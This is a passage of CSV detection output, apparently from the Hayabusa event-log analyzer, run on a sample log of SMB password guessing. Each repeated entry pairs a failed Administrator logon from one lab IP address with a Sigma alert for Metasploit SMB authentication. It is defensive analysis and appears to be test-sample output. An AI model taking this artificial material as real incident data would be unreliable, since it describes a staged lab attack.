Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
